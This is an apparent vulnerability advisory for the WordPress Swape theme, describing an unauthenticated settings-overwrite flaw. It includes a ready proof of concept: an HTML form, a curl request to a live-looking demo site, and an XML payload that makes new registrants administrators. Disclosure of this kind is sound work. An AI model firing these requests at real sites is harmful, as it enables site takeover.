Swape Theme - Authentication Bypass and Stored XSS

2018-02-0800:00:00

Aaron

0.005 Low

EPSS

Percentile

75.4%

JSON

Similar to https://wpvulndb.com/vulnerabilities/8061, but with no authentication The theme suffers from a privilege escalation vulnerability, any user can trigger this vulnerability due to weak permissions checking. An attacker can update options, such as changing user’s default role, registration state and others, which may lead to executing commands/code on the server and taking over the website.

<form action="http://my-example-site.test/wp-admin/admin-ajax.php" method="post" >
    <input name="action" value="call_upper_load_settings" type="text" />
    <input name="xmlPath" value="https://pastebin.com/raw/VCadYnh7" type="text" />
    <input type="submit" >
</form>

or

curl --request POST \
    --url https://upperinc.com/previews/wp/swape/demo1/wp-admin/admin-ajax.php \
    --header 'content-type: multipart/form-data;' \
    --form action=call_upper_load_settings \
    --form xmlPath=https://pastebin.com/raw/VCadYnh7


and the pastebin content is:

<?xml version="1.0"?>
<root>
  <option>
    <id>default_role</id>
    <value>administrator</value>
  </option>
  <option>
    <id>users_can_register</id>
    <value>1</value>
  </option>
</root>